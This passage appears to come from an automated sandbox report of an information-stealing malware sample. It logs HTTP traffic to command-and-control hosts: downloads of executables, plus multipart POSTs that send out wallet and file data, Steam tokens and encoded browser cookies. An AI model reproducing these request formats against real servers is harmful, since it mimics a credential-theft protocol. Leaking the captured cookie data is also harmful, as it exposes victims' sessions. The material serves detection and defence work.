Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKKHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKFBAFIDAEBFHJKJEBFHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 46 2d 2d 0d 0a Data Ascii: ------KJKFBAFIDAEBFHJKJEBFContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------KJKFBAFIDAEBFHJKJEBFContent-Disposition: form-data; name="message"wallets------KJKFBAFIDAEBFHJKJEBF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJEHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="message"files------FIDAFIEBFCBKFHIDHIJE--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="file"------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="message"ybncbhylepme------HJEHIJEBKEBFBFHIIDHI--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKKEHJDHJKFIECAAKFIJ--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGHost: urusvisa.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 2d 2d 0d 0a Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="hwid"54A50671C48A3788952882-a33c7340-61ca------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------CFCGIIEHIEGDGDGCAEBG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="mode"1------KJEHDHIEGIIIDHIDHDHJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="mode"2------KEGCBFCBFBKFHIECAFCF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: urusvisa.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 2d 2d 0d 0a Data Ascii: ------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="mode"21------EBAKEBAECGCBAAAAAEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: urusvisa.comContent-Length: 7629Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCHost: urusvisa.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 2d 2d 0d 0a Data Ascii: ------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="file_name"Q29va2llc
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: urusvisa.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="hwid"54A50671C48A3788952882-a33c7340-61ca------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------HJJKFBGCFHCGDHIDAAEC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 2d 2d 0d 0a Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="mode"1------EHCBAAAFHJDHJJKEBGHI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 2d 2d 0d 0a Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="mode"2------FIJECAEHJJJKJKFIDGCB--
